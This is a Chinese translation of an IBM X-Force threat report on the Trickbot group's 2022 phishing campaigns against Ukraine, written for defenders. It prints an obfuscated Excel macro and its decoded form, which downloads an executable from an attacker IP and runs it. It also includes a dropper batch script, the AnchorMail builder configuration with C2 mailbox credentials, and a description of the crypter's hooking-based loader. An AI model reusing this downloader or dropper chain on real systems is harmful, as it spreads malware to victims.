前所未有的轉變:Trickbot 集團正在系統地攻擊烏克蘭
前所未有的轉變:Trickbot 集團正在系統地攻擊烏克蘭
經過我們團隊的持續研究,IBM Security X-Force 發現了證據,表明總部位于俄羅斯的網絡犯罪集團“Trickbot 組織”自俄羅斯入侵以來一直在系統地攻擊烏克蘭——這是前所未有的轉變,因為該組織以前沒有針對烏克蘭。在 2022 年 4 月中旬至 6 月中旬期間,Trickbot 小組被 X-Force 跟蹤為ITG23也被稱為 Wizard Spider、DEV-0193 和 Conti 小組,已經針對烏克蘭進行了至少六次活動——其中兩次已被 X-Force 發現——在此期間,他們部署了 IcedID、CobaltStrike、AnchorMail 和 Meterpreter。在俄羅斯入侵之前,不知道 ITG23 以烏克蘭為目標,如果檢測到烏克蘭語,該組織的大部分惡意軟件甚至被配置為不在系統上執行。
ITG23 針對烏克蘭的活動之所以引人注目,是因為該活動與歷史先例的不同程度以及這些活動似乎是專門針對烏克蘭的,其中一些有效載荷表明目標選擇程度更高。
ITG23 是一個有經濟動機的網絡犯罪團伙,主要以開發 Trickbot 銀行木馬而聞名,該木馬于 2016 年首次被發現;從那時起,該組織就使用其有效載荷在勒索軟件攻擊的受害者環境中站穩腳跟,包括 Ryuk、Conti 和 Diavol。觀察到的針對烏克蘭的系統性攻擊包括針對烏克蘭國家當局、烏克蘭個人和組織以及普通民眾的已報告和疑似網絡釣魚攻擊。導致數據盜竊或勒索軟件的成功攻擊將為 ITG23 提供額外的勒索機會,特別是破壞性攻擊可能會損害烏克蘭的經濟。
本博客中報道的觀察到的活動凸顯了這一群體在持續沖突的背景下選擇符合俄羅斯國家利益的目標的趨勢。除了 Conti Ransomware 組織(IBM 作為 ITG23 的一部分跟蹤該組織)宣布他們將在入侵烏克蘭之初采取行動支持俄羅斯國家利益之外,ITG23 成員之間泄露的聊天記錄表明,該組織內部的兩名高級人員該組織此前曾在 2021 年 4 月中旬討論過針對“與俄羅斯聯邦合作”的實體,并同意他們是(俄羅斯)“愛國者”。此外,Bellingcat 的執行董事聲稱收到了小費一個網絡犯罪組織正在與俄羅斯聯邦安全局 (FSB) 進行通信。
在調查這些活動時,X-Force 分析師還發現了 ITG23 正在使用的新惡意軟件和工具:用于傳遞有效負載的惡意 Excel 下載器、旨在刪除和構建 ITG23 有效負載(如 AnchorMail)的自解壓存檔 (SFX),以及惡意軟件加密器 X-Force 被稱為“Forest”。值得注意的是,Forest 加密器也被用于Bumblebee 惡意軟件,進一步證明 ITG23 是 Bumblebee 的幕后黑手。在本文中,我們詳細介紹了我們確定的六項活動,并描述了在這些攻擊中使用的新惡意軟件和工具。
Trickbot Group 活動針對烏克蘭
X-Force 分析師調查了至少六次 ITG23 活動,專門針對烏克蘭,發生在 4 月中旬至 6 月中旬。CERT-UA 披露了其中四項活動,并以組名 UAC-0098 對其進行跟蹤,而該分析介紹了 X-Force 新發現的兩項活動。根據我們對這些活動的分析,X-Force 評估:
- ITG23 本身控制著電子郵件和惡意軟件的傳遞——也就是說,它們不是由獨立的分銷分支機構執行的。這些活動都與已知的 ITG23 第三方分發分支機構用于將有效負載交付到其目標的技術不一致。2021 年,X-Force 分析師跟蹤了幾項可能由 ITG23 人員直接實施的活動。
- 六個活動中有三個使用了在其他活動中未觀察到的惡意 Excel 下載程序。
- 兩個活動使用 ISO 映像文件來分發有效負載;這些 ISO 文件可能是由一個精品 ISO 構建器創建的,該構建器提供了以前提供 ITG23 有效負載的活動。
- 六個活動中有五個直接將 CobaltStrike、Meterpreter 或 AnchorMail 下載到目標機器上。通常情況下,這些有效載荷會在 Trickbot、Emotet 或 IcedID 等惡意軟件開始感染期間稍后下載,這表明這些攻擊是 ITG23 愿意立即部署更高價值后門的目標活動的一部分。
- CobaltStrike 和 IcedID 有效載荷在六次活動中的四次中使用,都使用 ITG23 的 Tron、Hexa 或 Forest 加密器。帶有樣本的 ITG23 加密器的存在強烈表明其開發商、分銷商或運營商可能是 ITG23 的一部分或與該組織有合作關系。加密程序是旨在加密和混淆惡意軟件以逃避防病毒掃描程序和惡意軟件分析師分析的應用程序。
活動 #1:ITG23 在 4 月中旬提供 IcedID
4 月中旬,ITG23 使用網絡釣魚電子郵件向烏克蘭的目標發送惡意 Excel 文件(詳細描述如下),這些目標下載并安裝了 IcedID。ITG23與 IcedID 組織的關系可以追溯到幾年前,并且在分別于 2021 年 12 月和 2022 年 2 月停止使用 Trickbot 和 Bazarloader 后,很可能依靠 IcedID 獲得對受害者環境的初始訪問權限。根據CERT-UA,該運動的目標包括烏克蘭的“公民之間的大規模分發”,這表明該國境內的歧視性目標較少。惡意電子表格使用文件名“Список моб?л?зованих громадян.xls”(“動員公民名單.xls”)、“Моб?л?зац?йний список.xls”(“動員列表.xls”)和“Моб?л?зац?йний ре?.стр.xls” xls”)。在此活動期間下載的 IcedID 樣本使用了 ITG23 的Tron 和 Hexa 加密器,進一步將此活動與 ITG23 聯系起來。
運動#1 IOC:
活動 #2:ITG23 在 4 月中旬提供 CobaltStrike
在 4 月中旬上述活動后不久,ITG23 使用類似的惡意 Excel 文件下載了使用 ITG23“Tron”加密器的 CobaltStrike 樣本。CERT-UA 將此活動稱為“對烏克蘭國家組織的網絡攻擊”,并透露攻擊者使用了主題為“Срочно! Деблокация Азовстали Терм?ново!Розблокування ?Азовстал??“(“緊急!緊急解鎖 Azovstal!解鎖“Azovstal”)。此活動中使用的惡意 Excel 電子表格從烏克蘭上傳到 VirusTotal 存儲庫,文件名為“В?йськов? на Азовстал?”(“亞速斯塔爾的軍隊”)。據報道,針對國家組織和直接下載 CobaltStrike 表明這是針對特定受害者的更有針對性的攻擊。
運動#2 IOC:
活動 #3:ITG23 在 4 月下旬交付 Meterpreter
4 月下旬,CERT-UA發布了提供 Meterpreter 的網絡釣魚活動的詳細信息,他們認為該活動與 Trickbot 組有關。該活動使用主題為“Укаs Преs?ема Уврацп No 576/22 про безпрецtaемн? заходп безпекп”(“歐盟新聞辦公室關于不間斷安全措施的第 576/22 號法令”)的電子郵件來傳遞 ISO 映像文件。CERT-UA 表示,這次襲擊是針對“烏克蘭國家當局”。與活動 #2 類似,報告的針對國家組織和直接下載 Meterpreter 表明該活動針對特定目標。
X-Force 分析師發現了將此 ISO 映像文件和活動與 ITG23 相關聯的其他信息。CERT-UA 描述了一個執行序列,其中嵌入式 Microsoft 快捷方式 (LNK) 文件使用命令“-exec bypass -wh -file z.ps1”執行 PowerShell 腳本“z.ps1”,該命令會刪除一個以烏克蘭為主題的誘餌文檔,并執行 Meterpreter 可執行文件 (b.exe)。在 5 月下旬針對烏克蘭的 ITG23 戰役(戰役#5)中使用了幾乎相同的執行順序,下文將進一步描述。
我們懷疑這些 ISO 映像來自使用 UltraISO 或 PyCdlib 創建磁盤映像的構建器。ITG23 及其分銷附屬公司,如 Hive0107(又名 TA578)之前已經采購了可能來自該構建器的 ISO。在 2 月和 3 月,兩個活動(其中一個屬于 Hive0107)使用 ISO 映像來提供與 4 月下旬(活動#3)和 5 月下旬(活動#5)針對烏克蘭使用的 ISO 相似的 IcedID。例如:
- 兩個 ISO 都包含在同一臺機器“desktop-ouvurbp”上創建的 LNK 文件以及其他相同的元數據。
- 兩個 ISO 都使用 4 月份確定的相同 PowerShell 命令:“-exec bypass -wh -file z.ps1”。
- 3 月份使用的 PowerShell 腳本類似于活動 #3 和 #5 中使用的腳本,使用“Start-Process”命令刪除誘餌文檔并執行 PE 文件。
運動#3 IOC:
2022 年 2 月和 2022 年 3 月用于交付 IcedID 的相關 ISO 映像:
國際標準化組織89e052bd182df8de5960784c663f962d44e058c8920a437f54ab75d03a7da3bd
國際標準化組織c129a8bf28d476a7280535f0ce192769d8cb1fa519bab306ff506c08cbcf7436
活動#4:ITG23 于 5 月初交付 AnchorMail
5 月初,X-Force 發現了一個使用惡意 Excel 文件的活動,該文件與前兩個活動中使用的惡意 Excel 文件非常相似,這些活動下載了AnchorMail,這是一個由 ITG23 開發并基于其 AnchorDNS 惡意軟件的后門。將 Anchor 后門直接下載為攻擊的第一階段是不尋常的;通常,它們會在感染后期安裝。它們的使用表明該活動可能針對特定的個人或組織,盡管我們缺乏關于特定目標集的信息。
該電子表格于 5 月 5 日從烏克蘭上傳到 VirusTotal 存儲庫,名稱為 Nuclear.xls——暗示著令人震驚的誘惑。該文件是從使用烏克蘭國家代碼頂級域的域下載的:“lviv.uz[.]ua”。執行時,電子表格會下載一個 WinRAR 自解壓存檔 (SFX)(有關更多詳細信息,請參見下文),該存檔會提供 AnchorMail 后門。我們還確定了使用此 SFX 作為其安裝序列的一部分的其他 ITG23 有效負載,包括 IcedID 和 CobaltStrike。
運動#4 IOC
活動 #5:ITG23 在 5 月下旬提供 CobaltStrike
X-Force 分析師還確定了可能在 5 月下旬或 6 月初發生的針對烏克蘭的 ITG23 運動。該活動使用了 5 月 31 日創建的 ISO 映像文件,該文件與 4 月下旬的活動 #3 中描述的文件非常相似。ISO 于 2022 年 6 月 2 日從烏克蘭上傳到 VirusTotal 存儲庫,文件名為“ПовидомленняCN07.iso”(“Message CN07.iso”)。嵌入的 Microsoft Shortcut 文件執行 PowerShell 文件 z.ps1,該文件會刪除 PDF 誘餌報關單并執行 CobaltStrike 可執行文件 (b.exe)。
這個 CobaltStrike 樣本使用了一個新的 ITG23 惡意軟件加密器 X-Force 被稱為“Forest”(更多細節見下文)。值得注意的是,這個新的 Forest 加密器也被用于 Bumblebee 加載器樣本,進一步證明這個新的加載器系列是由 ITG23 構建和操作的。
運動#5 IOC:
活動 #6:ITG23 在 6 月中旬提供 CobaltStrike
X-Force 分析師在 6 月中旬使用 ITG23 的 Tron 加密器發現了一個可疑的 CobaltStrike 樣本,表明與 ITG23 或其合作伙伴或附屬機構之一存在關系。幾天后,CERT-UA發布了一份報告,表明該 CobaltStrike 樣本被用于最近針對“烏克蘭關鍵基礎設施”的網絡釣魚攻擊。為了傳遞有效載荷,攻擊者使用聲稱來自“Державна податкова служба Укра?ни”(“烏克蘭國家稅務局”)的電子郵件,主題為“Пов?домпення про несплаry nодатку”(“報告未繳稅款”)到提交一份名為“Накладення штрафних санкц?й.docx”(“Imposition ofpension.docx”)的惡意文件。該文件包含在名為“НакладенняШтрафнихСанкц?.zip”(“Imposition of Penalty Sanctions.zip”)的 Zip 檔案中。
電子郵件和誘餌文件包含有關在烏克蘭納稅的要求的信息。值得注意的是,誘餌文件中的文字與此網頁上發布的有關烏克蘭稅收要求的文字相同。打開時,惡意文檔使用漏洞 CVE-2022-30190(“Follina”)下載一個 html 文件,該文件將依次下載并執行 CobaltStrike Beacon。值得注意的是,這個 Beacon 中嵌入的 SSL 公鑰與 Campaign #5 中使用的 Beacon 中的相同,這表明這兩個 Beacon 可以追溯到同一個 CobaltStrike Team Server 安裝。
運動#6 IOC:
攻擊表明網絡犯罪分子支持俄羅斯的利益
ITG23 活動以前避開了烏克蘭的目標。長期以來,講俄語的地下犯罪社區通常不鼓勵(如果不是完全禁止)追捕前蘇聯國家以及(盡管與烏克蘭無關)獨立國家聯合體(CIS)的成員。該行為準則可能是為了避免在惡意軟件運營商的居住國造成受害者,很大程度上是為了避免與執法部門發生沖突。它還有一個額外的好處,那就是鼓勵基于我們與其他人團結一致的共同意識的講俄語的犯罪合作。根據美國司法部 (DOJ) 于 2021 年發布的起訴書,ITG23(Trickbot 背后的組織)在多個前蘇聯國家開展業務,包括白俄羅斯、俄羅斯和烏克蘭。
然而,今年在講俄語的網絡犯罪生態系統中,意識形態分歧和忠誠度越來越明顯,ITG23 是主要案例研究。Conti Ransomware 組織在沖突初期宣布了親俄立場,表示他們承諾攻擊反對莫斯科的實體。據報道,暴露了 ITG23 成員之間交換的消息日志和其他文件的 ContiLeaks 是由一名烏克蘭研究人員獲得并泄露的。
盡管我們尚未在更廣泛的范圍內觀察到類似活動,但這些活動提供了證據,表明烏克蘭正處于俄羅斯著名網絡犯罪集團的瞄準目標中。在入侵之前和之后,烏克蘭一直是各種網絡活動的目標,包括分布式拒絕服務(DDoS) 攻擊和污損以及歸因于俄羅斯國家支持者的破壞性活動。
新的 ITG23 惡意軟件,用于攻擊烏克蘭的工具
X-Force 分析師檢測到在這些活動中使用的幾種新惡意軟件和工具:
- 用于下載有效負載的惡意 Excel 文件。
- 一個自解壓存檔 (SFX),旨在刪除和構建 ITG23 有效負載,例如 AnchorMail、CobaltStrike 和 IcedID。
- 一種新的 ITG23 惡意軟件加密器 X-Force 被稱為“Forest”。
惡意 Excel 下載器
針對烏克蘭的六個活動中有三個使用了類似的惡意 Excel 下載器。惡意下載程序代碼作為一個簡單的宏存儲在 Excel 文件中,該文件設置為在打開文件時運行,前提是用戶啟用了宏。如果宏被禁用,則惡意代碼將無法運行。
宏代碼從硬編碼的 URL 下載文件,將其保存到文件系統,然后執行下載的文件。分析的樣本中存在兩種代碼變體,一種下載可執行文件,然后不帶參數運行,另一種下載 DLL 文件,然后使用 Windows rundll32 命令運行該文件。
這些示例都在宏代碼中使用了基本的混淆技術,將一些函數和變量名稱替換為隨機生成的名稱,并將字符串值以十六進制 ascii 格式編碼并拆分為多個部分。混淆宏之一的示例如下:
Sub Workbook_Open()
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject(itslnwmojhejvmg("4d6963726f736f") & itslnwmojhejvmg("66742e584d4c48545450"))
Dim bStrm: Set krzbmwewmr = CreateObject(itslnwmojhejvmg("41646f64622e53747265") & itslnwmojhejvmg("616d"))
bnntwxnuvivrf.Open itslnwmojhejvmg("474554"), itslnwmojhejvmg("687474703a2f2f3139332e3134392e3137") & itslnwmojhejvmg("362e3137322f61746163686d656e742e657865"), False
bnntwxnuvivrf.Send
Dim sweidpa As String
sweidpa = Environ("AppData")
With krzbmwewmr
.Type = 1
.Open
.write bnntwxnuvivrf.responseBody
.savetofile sweidpa & itslnwmojhejvmg("5c736572766963657a2e") & itslnwmojhejvmg("657865"), 2
End With
Shell (sweidpa & itslnwmojhejvmg("5c736572") & itslnwmojhejvmg("766963657a2e657865"))
Application.ScreenUpdating = True
End Sub
解碼字符串會產生以下清理后的代碼:
Sub Workbook_Open()
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set krzbmwewmr = CreateObject("Adodb.Stream")
bnntwxnuvivrf.Open "GET", "http://193.149.176.172/atachment.exe", False
bnntwxnuvivrf.Send
Dim sweidpa As String
sweidpa = Environ("AppData")
With krzbmwewmr
.Type = 1
.Open
.write bnntwxnuvivrf.responseBody
.savetofile Environ("AppData") & "\servicez.exe", 2
End With
Shell (Environ("AppData") & "\servicez.exe")
Application.ScreenUpdating = True
End Sub
下載 URL、文件名和保存文件路徑在示例中都不同,如下所示。請注意,第一個示例似乎在執行文件名中有拼寫錯誤,與保存文件名不匹配,因此該示例不會正確執行。
WinRAR 自解壓存檔 (SFX) 滴管
用于 5 月初攻擊的最終樣本尤其值得注意。有人觀察到下載 AnchorMail,這是與 Trickbot Group (ITG23) 相關的 AnchorDNS 后門的升級版本。AnchorMail以使用基于電子郵件的 C2 服務器而著稱,它通過 TLS 使用 SMTP 和 IMAP 協議與之通信。Anchor 變體是更隱蔽的后門,該組織傳統上在直接攻擊優先級更高的目標時使用這些后門,因此,在活動的第一階段,惡意軟件直接下載 Anchor 樣本是不尋常的。
AnchorMail 示例也很有趣,因為它利用了以前未觀察到的 dropper,它使用捆綁的構建器工具來動態配置和生成 AnchorMail 惡意軟件二進制文件。在 IcedID 和 CobaltStrike 有效載荷中也發現了一個類似的 dropper。
在 AnchorMail 示例中,分析的 Dropper 采用 WinRAR 自解壓存檔 (SFX) 的形式,它將文件集合(包括腳本和可執行文件)提取到目錄C:\windows\tasks,然后執行第一個腳本文件。其中一個腳本負責執行名為buildDelegate_x64.exe的 AnchorMail 構建器工具。名為conf.txt的文本文件包含在刪除的文件中,并作為參數傳遞給構建器。此文本文件包含 AnchorMail 惡意軟件的所需配置。構建器解析配置文件并使用內容為 AnchorMail 構建配置數據塊,然后對其進行加密,然后注入惡意軟件的模板 DLL。然后將配置的 AnchorMail 二進制文件以文件名delegat.dll寫入磁盤。
然后, dropper使用內置的 Windows rundll32 命令執行生成的delegat.dll二進制文件,并且還會執行第二個腳本,刪除之前刪除的文件。
下面介紹了有關 dropper 和 builder 工具的更多詳細信息。
以下文件由 dropper 提取:
滴管執行的初始文件是腳本文件123.vbs,它運行腳本文件1.bat,然后是2.bat。
文件1.bat包含以下腳本:
@echo off
buildDelegate_x64.exe --conf=conf.txt --source=delegate_x64.dll --target=delegat.dll
TIMEOUT /T 3
rundll32 c:\windows\tasks\delegat.dll,dllmain
TIMEOUT /T 3
該腳本執行文件buildDelegate_x64.exe,文件conf.txt、delegate_x64.dll和delegat.dll作為參數傳遞。
可執行文件buildDelegate_x64.exe是 AnchorMail 惡意軟件的構建工具,旨在注入具有指定配置值的已編譯模板二進制文件。這使得 AnchorMail 的運營商可以輕松地更新 AnchorMail 樣本的配置,而無需每次都從頭開始重新編譯惡意軟件。觀察到AnchorMail 的前身 AnchorDNS使用了類似的系統。
如果不帶參數執行,通過命令行,buildDelegate_x64.exe 會輸出以下信息:
usage: lackeyBuilder(.exe) --conf=<configure file> --source=<source file> --target=<target file>
config file fields:
period=<number of minutes between launch, max value (60 * 24 -1)>
mail=<email data>
email data: {user|password|imap server[:port]|smtp server[:port]} or {destination email address}
if first symbol of server is '*' - not using SSL for connecting
example conf file:
period=35
mail={test@usa.com|myPwd|imap.usa.com|smtp.usa.com}
mail={test@australian.com|pwd12345|*imap.australian.com|*smtp.australian.com}
mail={sendto@mail.mail}
mail={address@mailbox.com}
當使用正確的參數執行時,buildDelegate_x64.exe獲取源 DLL,在本例中為delegate_x64.dll,它是 AnchorMail 惡意軟件的模板,并使用文件conf.txt中指定的配置值對其進行修改。構建器解析conf.txt的內容,并使用它們為 AnchorMail 構建配置塊。
在本例中,conf.txt 包含以下內容:
period=10
mail={zakr_kurt1@15906-28547.bacloud.info|ohvohNgaeT6Shoche8Ei|15906-28547.bacloud.info|15906-28547.bacloud.info}
mail={zakr_kurt2@15906-28547.bacloud.info|doo9ahxuuBug9cuuV8ga|15906-28547.bacloud.info|15906-28547.bacloud.info}
mail={z1@15906-28547.bacloud.info}
然后構建器生成一個 16 字節的 XOR 密鑰并使用它來加密配置塊。然后將配置塊和 XOR 密鑰注入到模板二進制文件中,其中包含標記字符串 'YYYYYYYYYYYYYYYY' 和 'ZZZZZZZZZZZZZZZZ' 以指示二進制文件中應該寫入配置塊和密鑰的位置。然后將此更新的二進制文件保存為文件delegat.dll。
然后,該腳本使用內置的 Windows rundll32 命令執行生成的 DLL delegat.dll 。
最后,執行腳本文件2.bat刪除除生成的文件delegat.dll之外的所有刪除的文件。
使用 WinRAR SFX Dropper 選擇示例:
Forest Crypter 加載 CobaltStrike、Bumblebee
Forest crypter,也稱為 Bumblebee 加載器,是與 ITG23 相關的加載器/加密器,自 2022 年 4 月以來一直在野外觀察到。迄今為止,它主要用于Bumblebee 惡意軟件,但也發現加載 CobaltStrike 的樣本,例如上面在活動#5 中確定的那個。
Forest crypter 將其有效負載存儲在二進制數據部分的多個塊中。每個數據塊都被解密并組合在一起。然后使用 XOR 和生成的密鑰對構造的數據進行解密,然后通過另一輪解包生成最終的有效載荷二進制文件。
加載器能夠執行 shellcode 和 PE 有效負載,其中 shellcode 有效負載直接執行,PE 有效負載通過掛鉤技術間接執行。加載器在庫函數 NtOpenFile、NtCreateSection 和 NtMapViewOfSection 中安裝鉤子,這樣當調用這些 API 時,將執行加載器自己的函數。然后,加載程序將嘗試使用 LoadLibraryW API 加載庫“gdiplus.dll”,然后調用上述 NT API 并觸發掛鉤。鉤子函數將解壓后的有效載荷復制到新創建的部分,并將基地址返回給 LoadLibraryW,LoadLibraryW 繼續加載惡意有效載荷,認為它是合法的 gdiplus.dll。
使用 Forest 加密器選擇樣本:
樣本族SHA256 哈希熊蜂1b889f984f25b493c41a30fae0ade4c689f094b412953a8b033ebf44ae70d160鈷擊3622d825b2d8a5f280597459983f50dc0cad642cff0008f6f535d23173c4f953
建議
- 確保防病毒軟件和相關文件是最新的。
- 在您的環境中搜索指示 IOC 的現有跡象。
- 考慮對所有基于 URL 和 IP 的 IOC 進行阻止和/或設置檢測。
- 保持應用程序和操作系統在當前發布的補丁級別上運行。
- 不要在可以訪問公司網絡的設備上安裝未經批準的應用程序。
- 謹慎對待電子郵件中的附件和鏈接。
文章轉自:Ole Villadsen, Charlotte Hammond , Kat Weinberger
